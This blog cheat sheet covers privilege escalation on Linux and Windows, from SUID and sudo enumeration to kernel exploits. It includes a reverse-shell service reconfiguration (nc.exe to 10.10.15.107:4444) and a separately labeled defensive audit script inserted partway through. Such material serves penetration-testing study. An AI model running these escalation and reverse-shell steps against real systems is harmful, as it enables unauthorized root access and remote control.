Information Technology | Softwares - Graphics - Programming - Hacking - Security

Apr 12, 2020

Tips and Cheat Sheet useful for Privilege Escalation


Linux:

Sudo rights: list which commands and files the current user may run as root from the user's shell with:
$ sudo -l
Get a shell: /bin/bash -i
If sudo allows running a file as root and that file is writable by the user, add that line to the file and run it through sudo; this opens a root shell.

Find anything with SUID / SGID permission:

$ find / -perm -4000 -ls 2>/dev/null
$ find / -user root -perm -4000 2>/dev/null
$ find / -perm -2000 2>/dev/null

Writable folders:

$ find / -writable -type d 2>/dev/null
$ find / -perm -222 -type d 2>/dev/null
$ find / -perm -o=w -type d 2>/dev/null

Find any writable file owned by root:

$ find / -perm -002 -user root -type f -not -path "/proc/*" 2>/dev/null
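The SUID/SGID and writable-directory checks above, turned into a small audit script a defender can run against a known-good baseline. This is an added example, not code from the original post; the ROOT argument, the baseline file path and the sample cron usage are assumptions of this example.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): audit helpers built on the find
# commands above. list_setid prints set-id files, list_ww_dirs_nosticky prints
# world-writable directories without the sticky bit, and new_setid_since_baseline
# reports set-id files that were not present when the baseline was taken.

# Print SUID/SGID regular files under $1 (default /), sorted, skipping pseudo filesystems.
list_setid() {
  root="${1:-/}"
  find "$root" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
       -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Print world-writable directories under $1 that lack the sticky bit.
# A 1777 directory (like /tmp) is expected; a 0777 directory lets any user
# delete or replace other users' files, which is what a hardening check wants to flag.
list_ww_dirs_nosticky() {
  root="${1:-/}"
  find "$root" \( -path /proc -o -path /sys \) -prune -o \
       -type d -perm -0002 ! -perm -1000 -print 2>/dev/null | sort
}

# Compare the current set-id files under $1 with the baseline file $2 (one path per line).
# Prints every set-id file missing from the baseline. Returns 0 when nothing new
# was found and 1 when at least one new set-id file appeared.
new_setid_since_baseline() {
  root="$1"
  baseline="$2"
  tmp="$(mktemp)"
  sort "$baseline" > "$tmp"            # comm needs both inputs sorted
  new="$(list_setid "$root" | comm -13 "$tmp" -)"
  rm -f "$tmp"
  [ -z "$new" ] && return 0
  printf '%s\n' "$new"
  return 1
}

# Constructed usage as a periodic check (paths are placeholders):
#   list_setid / > /var/lib/setid.baseline   # taken once on a known-good host
#   new_setid_since_baseline / /var/lib/setid.baseline || echo "ALERT: new set-id binary"
#   list_ww_dirs_nosticky /                  # directories worth fixing with chmod +t or o-w
```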

Identify the kernel version and distribution:

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ lsb_release -a

"sendpage" and "dirtycow" are both kernel exploits used for privilege escalation once the kernel version is known to be affected.

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions:

https://gtfobins.github.io

There are tools that automatically enumerate exploitable signatures on the victim machine, such as LinEnum and pspy:

https://github.com/rebootuser/LinEnum
https://github.com/DominicBreuker/pspy


Windows:


Check services with write access:

> accesschk -a *
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Service exploit, e.g. reconfigure a service with an exploit command or reverse shell:
> sc.exe config usosvc binPath="C:\tmp\nc.exe 10.10.15.107 4444 -e powershell.exe"
Then restart service:
> sc.exe stop <service name>
> sc.exe start <service name>

Permissions on specific folders:

> icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
> icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

Look for backup files such as SAM.bak.


Check Credential Manager:

> dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
> dir C:\Users\username\AppData\Local\Microsoft\Credentials\
> cmdkey /list

Which privileges our token holds:

> whoami /priv

Which groups we belong to (what we can access):

> whoami /groups

Some useful tools:

https://github.com/Hackplayers/PsCabesha-tools

updating...

Most privilege-escalation work consists of identifying a signature or version and then looking for a matching exploit, e.g. by CVE or at https://www.exploit-db.com/

